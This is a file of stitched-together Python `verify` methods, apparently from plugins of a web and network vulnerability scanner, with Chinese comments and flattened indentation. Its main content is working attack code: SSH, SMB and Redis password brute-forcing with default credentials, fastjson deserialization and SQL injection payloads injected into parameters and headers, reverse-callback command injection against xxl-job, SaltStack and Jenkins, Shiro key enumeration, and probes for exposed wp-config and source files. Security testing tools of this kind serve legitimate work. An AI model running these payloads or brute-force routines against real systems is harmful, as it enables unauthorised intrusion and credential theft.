def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
swffile = [
'common/swfupload/swfupload.swf',
'adminsoft/js/swfupload.swf',
'statics/js/swfupload/swfupload.swf',
'images/swfupload/swfupload.swf',
'js/upload/swfupload/swfupload.swf',
'addons/theme/stv1/_static/js/swfupload/swfupload.swf',
'admin/kindeditor/plugins/multiimage/images/swfupload.swf',
'includes/js/upload.swf',
'js/swfupload/swfupload.swf',
'Plus/swfupload/swfupload/swfupload.swf',
'e/incs/fckeditor/editor/plugins/swfupload/js/swfupload.swf',
'include/lib/js/uploadify/uploadify.swf',
'lib/swf/swfupload.swf',
]
self.md5_list = [
'3a1c6cc728dddc258091a601f28a9c12',
'53fef78841c3fae1ee992ae324a51620',
'4c2fc69dc91c885837ce55d03493a5f5',
]
mythread(self.test, swffile, cmd_line_options.threads)
def verify(self):
if not self.check_rule(self.dictdata, self.require): # 检查是否满足测试条件
return
pwdfile = os.path.join("brute", "ssh_pass")
userfile = os.path.join("brute", "ssh_user")
pwds = [""]
pwds += get_data_from_file(
os.path.join(paths.MYSCAN_DATA_PATH, pwdfile))
users = get_data_from_file(
os.path.join(paths.MYSCAN_DATA_PATH, userfile))
userpass = []
for user in users:
for pwd in pwds:
userpass.append((user, pwd))
userpass_ = [("oracle", "oracle"), ("postgresql", "postgresql")]
userpass += userpass_
# patch_banner_timeout()
if "Authentication failed" in self.crack_ssh(
(get_random_str(6).lower(), get_random_str(6).lower())):
mythread(self.crack_ssh, userpass, 1)
if self.right_pwd is not None:
self.result.append({
"name":
self.name,
"url":
"tcp://{}:{}".format(self.addr, self.port),
"level":
self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"user/pwd": "/".join(self.right_pwd)
}
})
def verify(self):
# 限定一下目录深度,reverse还是严格点
if self.url.count("/") != 3:
return
reverse_urls, hexdata_url = generate_reverse_payloads(self.name)
reverse_dnscmd, hexdata_dns = generate_reverse_payloads(
self.name, "dns")
# reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls)
tasks = reverse_dnscmd + reverse_urls
mythread(self.run, tasks)
sleep = True
for hexdata in [hexdata_url, hexdata_dns]:
query_res, _ = query_reverse(hexdata, sleep)
sleep = False
if query_res:
parser_ = dictdata_parser(self.dictdata)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"others:": "{} in dnslog".format(hexdata),
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
break
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
reverse_urls, reverse_data = generate_reverse_payloads(self.name)
_, dns_data = generate(self.name, "dns")
tasks = []
for reverse_url in reverse_urls:
for cmd in [reverse_url, reverse_url.replace(reverse_set.get("reverse_http_ip", ""), dns_data)]:
for path in ["", "securityRealm/user/admin/"]:
tasks.append((cmd, path))
mythread(self.run, list(set(tasks)))
sleep = True
for hexdata in [reverse_data, dns_data]:
query_res, _ = query_reverse(hexdata, sleep)
sleep = False
if query_res:
parser_ = dictdata_parser(self.dictdata)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"others:": "{} in dnslog".format(hexdata),
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
break
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") == 3 and self.dictdata["url"]["protocol"] == "https":
host = self.dictdata["url"]["host"]
self.req = {
"method": "POST",
"url": self.url + "data/login",
"timeout": 30,
"headers": {
"Content-Type": "application/x-www-form-urlencoded",
"Connection": "close",
"Accept": "*/*",
"Origin": "https://{}".format(host),
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Dest": "empty",
"Referer": "https://{}/login.html".format(host),
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9"},
"data": '''user=root&password={}''',
"allow_redirects": False,
"verify": False,
}
self.run("calvin")
if not self.success and self.isidrac:
pwds = ["123456", "root", "!QAZ2wsx", "idarc"]
mythread(self.run, pwds)
def verify(self):
if self.dictdata.get("url").get("extension") in notAcceptedExt:
return
self.parse = dictdata_parser(self.dictdata)
if not self.can_output(self.parse.getrootpath() +
self.name): # 限定只输出一次
return
# 针对参数为json格式
params = self.dictdata.get("request").get("params").get("params_url") + \
self.dictdata.get("request").get("params").get("params_body")
test_args = []
for param in params:
arg = param.get("value", "")
if isjson(arg):
test_args.append(param)
# 针对body部分为json格式的数据包
if self.dictdata.get("request").get(
"content_type") == 4: # data数据类型为json
test_args.append(None)
payloads = [
'''{"RANDOM": {"@type": "java.net.Inet4Address", "val": "DOMAIN"}}''',
'''Set[{"@type":"java.net.URL","val":"http://DOMAIN"}''',
'''{{"@type":"java.net.URL","val":"http://DOMAIN"}:0''',
'''{"@type":"java.net.InetSocketAddress"{"address":,"val":"DOMAIN"}}''',
]
if test_args:
datas = []
for payload in payloads:
for arg_ in test_args:
datas.append((payload, arg_))
mythread(self.send_payload, datas, cmd_line_options.threads)
# query dns log
sleep = True
for param, hexdata in self.hexdatas:
res, res_data = query_reverse(hexdata, sleep)
sleep = False
if res:
self.result.append({
"name": self.name,
"url": self.parse.getrootpath(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg":
self.vulmsg,
"others":
"{} in dnslog".format(hexdata),
"param":
"no param ,body vuln" if param is None else param.get(
"name", ""),
"request":
self.parse.getrequestraw(),
"response":
self.parse.getresponseraw()
}
})
self.can_output(self.parse.getrootpath() + self.name, True)
return
def verify(self):
if not self.check_rule(self.dictdata, self.require): # 检查是否满足测试条件
return
pwdfile = os.path.join("brute", "smb_pass")
userfile = os.path.join("brute", "smb_user")
pwds = [""]
pwds += get_data_from_file(
os.path.join(paths.MYSCAN_DATA_PATH, pwdfile))
users = get_data_from_file(
os.path.join(paths.MYSCAN_DATA_PATH, userfile))
userpass = []
for user in users:
for pwd in pwds:
userpass.append((user, pwd))
mythread(self.crack_smb, userpass, cmd_line_options.threads)
if self.right_pwd is not None:
self.result.append({
"name":
self.name,
"url":
"tcp://{}:{}".format(self.addr, self.port),
"level":
self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"user/pwd": "/".join(self.right_pwd)
}
})
def verify(self):
if self.dictdata.get("url").get("extension") not in "":
return
if not self.can_output(self.parse.getrootpath() +
self.name): # 限定只输出一次
return
self.parse = dictdata_parser(self.dictdata)
reqs = []
params = self.dictdata.get("request").get("params").get("params_url")
# body为urlencode类型
if self.dictdata.get("request").get(
"content_type") == 1: # data数据类型为urlencode
params += self.dictdata.get("request").get("params").get(
"params_body")
# gen,payload 具体参数自己慢慢测试吧,没标定是那个参数
cmds = []
payloads_, hexdata = generate_reverse_payloads(self.name)
_, dnshexdata = generate_reverse_payloads(self.name, "dns")
for payload in payloads_:
cmds.append(payload)
cmds.append(
payload.replace(reverse_set.get("reverse_http_ip"),
dnshexdata))
for param in params:
for cmd in cmds:
for payload, func in self.payloads:
payload = payload % (func(cmd))
req = self.parse.getreqfromparam(param, "a", payload,
False)
reqs.append(req)
# send it
mythread(self.send, reqs)
# query
sleep = True
for hexdata in [hexdata, dnshexdata]:
query_res, _ = query_reverse(hexdata, sleep)
sleep = False
if query_res:
self.result.append({
"name": self.name,
"url": self.parse.getrootpath(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"others:": "{} in dnslog".format(hexdata),
"request": self.parse.getrequestraw(),
"response": self.parse.getresponseraw()
}
})
self.can_output(self.parse.getrootpath() + self.name, True)
break
def verify(self):
dictdata = self.dictdata
# 把请求体和响应体 base64解码,便于搜索
request_raw = base64.b64decode(self.dictdata.get("request").get("raw").encode("utf8"))
response_raw = base64.b64decode(self.dictdata.get("response").get("raw").encode("utf8"))
dictdata["request"]["raw"] = request_raw.decode("utf-8", errors="ignore")
dictdata["response"]["raw"] = response_raw.decode("utf-8", errors="ignore")
dictdata["request"]["headers"] = str(dictdata["request"]["headers"])
dictdata["response"]["headers"] = str(dictdata["response"]["headers"])
if "others" in dictdata.keys():
del dictdata["others"]
if "filter" in dictdata.keys():
del dictdata["filter"]
dictdata["source"] = "burp"
dictdata["url"]["ip"] = self.getaddr(dictdata.get("url").get("host"))
dictdata["url"]["pathroot"] = "{protocol}://{host}:{port}/".format(**dictdata.get("url"))
if dictdata["url"]["extension"] == "ico":
body = response_raw[int(dictdata.get("response").get("bodyoffset")):]
dictdata["url"]["icon_hash"] = str(mmh3.hash(base64.b64encode(body)))
actions = []
action = {
"_index": "httpinfo",
"_id": self.http_md5(dictdata),
"_source": dictdata
}
actions.append(action)
# get url from html
urls_from_html = self.get_html_url(dictdata["url"]["url"],
response_raw[int(dictdata.get("response").get("bodyoffset")):].decode(
"utf-8",
"ignore"),
dictdata["response"]["mime_inferred"])
logger.debug("urls_from_html total:{}".format(len(urls_from_html)))
if urls_from_html:
mythread(self.getaddr, self.hosts, 50)
for url_data in urls_from_html:
url_data["ip"] = self.dict_host_ip[url_data["host"]]
action_ = {
"_index": "httpinfo",
"_id": getmd5("{ip}{pathroot}{path}".format(**url_data)),
"_source": {"url": url_data,
"source": "html",
"ts": dictdata["ts"]}
}
actions.append(action_)
try:
helpers.bulk(others.es_conn, actions)
logger.debug("es insert {} lines".format(len(actions)))
except Exception as ex:
logger.warning("Plugin {} get error:{}".format(__name__, ex))
traceback.print_exc()
def verify(self):
if self.dictdata.get("url").get("extension")[:3].lower() not in ["", "php", "do", "action"]:
return
self.parser = dictdata_parser(self.dictdata)
params = self.dictdata.get("request").get("params").get("params_url") + \
self.dictdata.get("request").get("params").get("params_body")
if params:
for param in params:
thread_datas = [(param, test_payload) for test_payload in others.ssti_payloads]
mythread(self.inject, thread_datas, cmd_line_options.threads)
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
# 生成字典
self.similar_rate = 0.8 # 相似度 ,越大误报越高
self.parser = dictdata_parser(self.dictdata)
self.rootpath = self.parser.getrootpath()
self.dicc = list(set(others.url_dict_path + self.get_domain_backfile(self.dictdata.get("url").get("host"))))
self.error_content = self.check_url(get_random_str(10), verify=False)
mythread(self.run, self.dicc, cmd_line_options.threads)
def find_ip(self):
if is_ipaddr(self.domain):
return self.domain
red = getredis()
key = getmd5("domain_to_ip_" + self.domain)
res = red.get(key)
if res:
return res.decode()
mythread(self.query, copy.deepcopy(others.dns_servers), 6)
data = ",".join(list(self.msg))
red.set(key, data)
return data
def find_dnsservers(self):
logger.debug('[+] Validate DNS servers')
# for server in open('dict/dns_servers.txt').readlines():
dns_ips = []
for server in open(
os.path.join(paths.MYSCAN_DATA_PATH, "common",
"dns_servers.txt")).readlines():
server = server.strip()
if server and not server.startswith('#'):
dns_ips.append(server)
mythread(self.test_server, dns_ips, 5)
return self.dns_servers
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
paths = [
"wp-config.php", "wp-config-sample.php", "wp-config.php.txt",
"wp-config.php.bak", "wp-config.php.old", "wp-config-backup.txt",
"wp-config.php.save", "wp-config.php~", "wp-config.php.orig",
"wp-config.php.original", "wp-license.php?file=../..//wp-config",
"_wpeprivate/config.json"
]
mythread(self.check, paths, cmd_line_options.threads)
def verify(self):
addExt = [
'.php',
'.php3',
'.php4',
'.php5',
'.php7',
'.phtml',
'.asp',
'.aspx',
'.ascx',
'.asmx',
'.chm',
'.cfc',
'.cfmx',
'.cfml',
'.py',
'.rb',
'.pl',
'.cgi',
'.htm',
'.html',
]
if self.dictdata.get("url").get(
"extension").lower() in notAcceptedExt + addExt:
return
self.parse = dictdata_parser(self.dictdata)
self.maxkey = self.parse.getrootpath() + self.name
if not self.can_output(self.maxkey):
return
req = {
"headers": {
"Cookie": "rememberMe=1",
},
"timeout": 10,
"allow_redirects": False,
"verify": False,
}
req_ = self.parse.generaterequest(req)
r = request(**req_)
if r != None and "deleteMe" in r.headers.get("Set-Cookie", ""):
mythread(self.runit, self.shirokyes)
if not self.success:
self.save(r, "found shiro ,you can enum the key", 0)
def verify(self):
if self.dictdata.get("url").get("extension").lower() in notAcceptedExt:
return
self.parse = dictdata_parser(self.dictdata)
self.maxkey = self.parse.getrootpath() + self.name
set_cookie = self.dictdata.get("response").get("headers").get(
"Set-Cookie", None)
if set_cookie is not None and "rememberMe=deleteMe" in set_cookie:
# 一个站点只测试一次,无论成功与否
if not self.can_output(self.maxkey):
return
# 做过了一次,此ip:port将不会再做
self.can_output(self.maxkey, True)
# send key to enum
mythread(self.send_poc, self.shirokyes, cmd_line_options.threads)
# query from reverse_dnslog
sleep = True
for querykey, shirokey in self.querykeys.items():
res, resdata = query_reverse(querykey, sleep)
sleep = False
if res:
self.result.append({
"name": self.name,
"url": self.parse.getfilepath(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"key": shirokey,
"request": self.parse.getrequestraw(),
"response": self.parse.getresponseraw()
}
})
break
if self.result == []:
self.result.append({
"name": "shiro found",
"url": self.parse.getfilepath(),
"level": 0, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg":
"found shiro and brute key is failed. maybe the web server can't access dnslog ,try others tools .",
"request": self.parse.getrequestraw(),
"response": self.parse.getresponseraw()
}
})
def verify(self):
# 限定一下目录深度,涉及反连,谨慎点
if self.url.count("/") != 3:
return
# 验证是否是xxl-job
req = {
"method": "POST",
"url": self.url + "run",
"headers": {
"Content-Type": "application/json"
},
"allow_redirects": False,
"verify": False,
"timeout": 10
}
r = request(**req)
if r is not None and b"com.xxl.job.core.server" in r.content:
reverse_urls, hexdata_url = generate_reverse_payloads(self.name)
reverse_dnscmd, hexdata_dns = generate_reverse_payloads(
self.name, "dns")
# reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls)
tasks = reverse_dnscmd + reverse_urls
mythread(self.run, tasks)
sleep = True
for hexdata in [hexdata_url, hexdata_dns]:
query_res, _ = query_reverse(hexdata, sleep)
sleep = False
if query_res:
parser_ = dictdata_parser(self.dictdata)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"others:": "{} in dnslog".format(hexdata),
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
break
def verify(self):
# 添加限定条件
acceptedExt = ["php", "php3", "php4", "php5", "asp", "aspx", "jsp", "cfm", "pl", "shtml"]
if self.dictdata.get("url").get("extension").lower() not in acceptedExt:
return
dirname = self.dictdata.get("url").get("path_folder")
basename = os.path.basename(self.dictdata.get("url").get("path", ""))
filename, ext = os.path.splitext(basename)
ariants = [
filename + "/%3f." + ext,
filename + ext.upper(),
filename + ext[:-1] + parse.quote(ext[-1]),
filename + "%252e" + ext,
basename + ".%E2%73%70",
basename + "%2easp",
basename + "%2e",
basename + "\\",
basename + "?*",
basename + "+",
basename + "%20",
basename + "%00",
basename + "%01",
basename + "%2f",
basename + "%5c",
basename + ".htr",
basename + "::DATA"
]
self.regexs = [
"(\<%[\s\S]*Response\.Write[\s\S]*%\>)",
"(\<\?php[\x20-\x80\x0d\x0a\x09]+)",
"(^#\!\\\/[\s\S]*\\\/perl)",
"(^#\!\/[\s\S]*?\/python)",
"(^#\!\/usr\/bin\/env\spython)",
"(^#\!\/[\s\S]*?\/perl)",
"using\sSystem[\s\S]*?class\s[\s\S]*?\s?{[\s\S]*}"
]
self.regexWhitelist = [
"([^0-9a-zA-Z]+bxss\.me[^0-9a-zA-Z]+)",
"([^0-9a-zA-Z]+r87\.me[^0-9a-zA-Z]+)",
"(bnNsb29rdXAgbXFpc3d2dHh0c[a-zA-Z0-9]+5yODcubWU)"
]
paths = [os.path.join(dirname, x) for x in ariants]
mythread(self.send_req, paths, cmd_line_options.threads)
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
# 验证是否是saltstack
req = {
"method": "GET",
"url": self.url,
"allow_redirects": False,
"verify": False,
"timeout": 10
}
r = request(**req)
if r is not None and b"local_async" in r.content and b"local_batch" in r.content:
reverse_urls, hexdata_url = generate_reverse_payloads(self.name)
reverse_dnscmd, hexdata_dns = generate_reverse_payloads(
self.name, "dns")
# reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls)
tasks = reverse_dnscmd + reverse_urls
mythread(self.run, tasks)
sleep = True
for hexdata in [hexdata_url, hexdata_dns]:
query_res, _ = query_reverse(hexdata, sleep)
sleep = False
if query_res:
parser_ = dictdata_parser(self.dictdata)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"others:": "{} in dnslog".format(hexdata),
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
break
def verify(self):
if not self.check_rule(self.dictdata, self.require): # 检查是否满足测试条件
return
pwdfile = os.path.join("brute", "redis_pass")
pwds = [None]
pwds += get_data_from_file(
os.path.join(paths.MYSCAN_DATA_PATH, pwdfile))
mythread(self.crack_redis, pwds, cmd_line_options.threads)
if self.right_pwd is not None:
self.result.append({
"name":
self.name,
"url":
"tcp://{}:{}".format(self.addr, self.port),
"level":
self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"password": self.right_pwd
}
})
def verify(self):
if self.dictdata.get("url").get("extension") in notAcceptedExt:
return
self.parse = dictdata_parser(self.dictdata)
if not self.can_output(self.parse.getrootpath() +
self.name): # 限定只输出一次
return
params = self.dictdata.get("request").get("params").get("params_url") + \
self.dictdata.get("request").get("params").get("params_body")
# 匹配json格式的参数值
test_args = []
for param in params:
arg = param.get("value", "")
if isjson(arg):
test_args.append(param)
# 匹配body为json格式的
if self.dictdata.get("request").get(
"content_type") == 4: # data数据类型为json
test_args.append(None)
mythread(self.send_payload, test_args, cmd_line_options.threads)
self.query()
def verify(self):
# 限定一下目录深度,reverse还是严格点
if self.url.count("/") != 3:
return
reverse_urls, reverse_data = generate_reverse_payloads(self.name)
# reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls)
_, dns_data = generate(self.name, "dns")
tasks = []
for reverse_url in reverse_urls:
for cmd in [
reverse_url,
reverse_url.replace(reverse_set.get("reverse_http_ip", ""),
dns_data)
]:
tasks.append(cmd)
mythread(self.run, tasks)
sleep = True
for hexdata in [reverse_data, dns_data]:
query_res, _ = query_reverse(hexdata, sleep)
sleep = False
if query_res:
parser_ = dictdata_parser(self.dictdata)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"others:": "{} in dnslog".format(hexdata),
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
break
def verify(self):
if self.dictdata.get("url").get("extension").lower() in notAcceptedExt:
return
self.parser = dictdata_parser(self.dictdata)
# send again . to find dynamic text
self.dynamic = []
r = request(**self.parser.getrawrequest())
if r != None:
ret = findDynamicContent(
self.parser.getresponsebody().decode(errors="ignore"), r.text)
if ret:
self.dynamic.extend(ret)
if self.dictdata.get("response").get("mime_stated") == "HTML":
self.text = getFilteredPageContent(
removeDynamicContent(r.text, self.dynamic))
else:
self.text = removeDynamicContent(r.text, self.dynamic)
else:
return
# test url and body params
sql_flag = [
"' and '{0}'='{1}",
'" and "{0}"="{1}',
]
# url and body
params = self.dictdata.get("request").get("params").get("params_url") + \
self.dictdata.get("request").get("params").get("params_body")
if params:
for param in params:
success = False
payloads = copy.deepcopy(sql_flag)
if param.get("value") in ["desc", "asc"]:
payloads += [
",if('{0}'='{1}',1,(select 1 from information_schema.tables))"
]
for payload in payloads:
random_str = get_random_str(2).lower()
payload_right = payload.format(random_str + "a",
random_str + "a")
payload_false = payload.format(random_str + "b",
random_str + "c")
req_true = self.parser.getreqfromparam(
param, "a", payload_right)
req_false = self.parser.getreqfromparam(
param, "a", payload_false)
if self.inject(req_false, req_true, payload_right,
payload_false, param.get("name")):
success = True
break
if not success and str(param.get("value")).isdigit():
param_value = param.get("value")
random_num = random.randint(2, 8)
payloads_num = [
("/0", "*1"),
("/**/and+{0}={1}".format(random_num, random_num + 1),
"/**/and+{0}={1}".format(random_num, random_num)),
]
for payload_false, payload_right in payloads_num:
req_true = self.parser.getreqfromparam(
param, "a", payload_right)
req_false = self.parser.getreqfromparam(
param, "a", payload_false)
if self.inject(req_false, req_true,
param_value + payload_right,
param_value + payload_false,
param.get("name")):
break
pass
# host header 部分
if not plugin_set.get("sqli").get("header_inject"):
return
header_msg = {
"User-Agent": {
"msg":
"sqli_boolen_ua",
"default":
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36"
},
"Referer": {
"msg": "sqli_boolen_referer",
"default": "https://www.qq.com/search"
},
"X-Forwarded-For": {
"msg": "sqli_boolen_xff",
"default": "12.40.9.144"
},
"Real-Ip": {
"msg": "sqli_boolen_ri",
"default": "2.40.9.144"
},
"X-Forwarded-Host": {
"msg": "sqli_boolen_xfh",
"default": "2.40.9.144"
},
}
reqs = []
for k, v in header_msg.items():
if self.output(v.get("msg")):
logger.debug("start {} inject ".format(k))
headers = copy.deepcopy(
self.dictdata.get("request").get("headers"))
if k not in headers.keys():
headers[k] = v.get("default")
reqs.append((headers, k, v))
mythread(self.inject_headers, reqs, cmd_line_options.threads)
def verify(self):
if self.dictdata.get("url").get("extension").lower() in notAcceptedExt:
return
# 搜索返回包:
self.parser = dictdata_parser(self.dictdata)
# 黑名单
# tomcat
if self.dictdata.get("url").get("path").startswith(
"/examples/") or self.dictdata.get("url").get(
"path").startswith("/docs/"):
return
# body url参数注入
random_num = get_random_num(8)
random_num_md5 = getmd5(random_num)
payloads = [
('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format(
random_num), random_num_md5, "a"),
("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format(
random_num), random_num_md5, "a"),
("'and(select'1'from/**/cast(md5({})as/**/int))>'0".format(
random_num), random_num_md5, "a"),
('"and(select\'1\'from/**/cast(md5({})as/**/int))>"0'.format(
random_num), random_num_md5, "a"),
("'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))>'0"
.format(random_num), random_num_md5, "a"),
('"and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'{}\')))>"0'
.format(random_num), random_num_md5, "a"),
("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format(
random_num), random_num_md5, "a"),
('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format(
random_num), random_num_md5, "a"),
("/**/and/**/cast(md5('{}')as/**/int)>0".format(random_num),
random_num_md5, "a"),
("convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))".
format(random_num), random_num_md5, "w"),
("extractvalue(1,concat(char(126),md5({})))".format(random_num),
random_num_md5, "w")
]
params = self.dictdata.get("request").get("params").get("params_url") + \
self.dictdata.get("request").get("params").get("params_body")
reqs = []
if params:
for param in params:
for payload, search_str, method in [('鎈\'"\(', None, "a")
] + payloads:
req = self.parser.getreqfromparam(param, method, payload)
reqs.append(
(req, payload, search_str, random_num_md5, param))
mythread(self.args_inject, reqs, cmd_line_options.threads)
# header注入
if not plugin_set.get("sqli").get("header_inject"):
return
header_msg = {
"User-Agent": {
"msg":
"sqli_error_ua",
"default":
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36"
},
"Referer": {
"msg": "sqli_error_referer",
"default": "https://www.qq.com/search"
},
"X-Forwarded-For": {
"msg": "sqli_error_xff",
"default": "12.40.9.144"
},
"Real-Ip": {
"msg": "sqli_error_ri",
"default": "2.40.9.144"
},
"X-Forwarded-Host": {
"msg": "sqli_error_xfh",
"default": "2.40.9.144"
},
}
reqs = []
for k, v in header_msg.items():
if self.output(v.get("msg")):
logger.debug("start {} inject ".format(k))
headers = copy.deepcopy(
self.dictdata.get("request").get("headers"))
if k not in headers.keys():
headers[k] = v.get("default")
for payload, search_str, method in [('\'"\(', None, "a")
] + payloads:
headers_withpayload = copy.deepcopy(headers)
headers_withpayload[k] = headers_withpayload[
k] + payload if method == "a" else payload
req = self.parser.generaterequest(
{"headers": headers_withpayload})
reqs.append((req, (payload, search_str, k, v.get("msg"))))
mythread(self.header_inject, reqs, cmd_line_options.threads)
def verify(self):
mythread(self.poc, self.tests, cmd_line_options.threads)
def verify(self):
if self.dictdata.get("url").get("extension").lower() in notAcceptedExt:
return
self.parser = dictdata_parser(self.dictdata)
# args inject
params = self.dictdata.get("request").get("params").get("params_url") + \
self.dictdata.get("request").get("params").get("params_body")
if params:
for param in params:
self.param = param
self.injectstatus = False
payloads = copy.deepcopy(self.payloads_alpha) + copy.deepcopy(
self.payloads_digit)
mythread(self.args_inject, payloads, cmd_line_options.threads)
# header inject
if not plugin_set.get("sqli").get("header_inject"):
return
header_msg = {
"User-Agent": {
"msg":
"sqli_timeblind_ua",
"default":
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36"
},
"Referer": {
"msg": "sqli_timeblind_referer",
"default": "https://www.qq.com/search"
},
"X-Forwarded-For": {
"msg": "sqli_timeblind_xff",
"default": "12.40.9.144"
},
"Real-Ip": {
"msg": "sqli_timeblind_ri",
"default": "2.40.9.144"
},
"X-Forwarded-Host": {
"msg": "sqli_timeblind_xfh",
"default": "2.40.9.144"
},
}
reqs = []
payloads = copy.deepcopy(self.payloads_alpha)
for k, v in header_msg.items():
if self.output(v.get("msg")):
logger.debug("start timeblind {} inject ".format(k))
headers = copy.deepcopy(
self.dictdata.get("request").get("headers"))
if k not in headers.keys():
headers[k] = v.get("default")
for test_payload in payloads:
reqs.append((headers, k, v, test_payload))
# for test in payloads:
# headers_withpayload = copy.deepcopy(headers)
# reqs.append()
# headers_withpayload[k] = headers_withpayload[k] + payload if method == "a" else payload
# req =self.parser.generaterequest({"headers": headers_withpayload})
# reqs.append((req, (payload, search_str, k, v.get("msg"))))
mythread(self.headers_inject, reqs, cmd_line_options.threads)
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
mythread(self.poc1, self.get_cmds(), cmd_line_options.threads)
self.poc2()
def verify(self):
# 限定根目录
if self.url.count("/") != 3:
return
mythread(self.run, self.get_payloads())
def verify(self):
# 限定根目录
if self.url is not None:
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
mythread(self.run, self.get_payloads())
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
mythread(self.runit, ["getSpiritsFromVideo", "getImage", "getImageMP4"], cmd_line_options.threads)
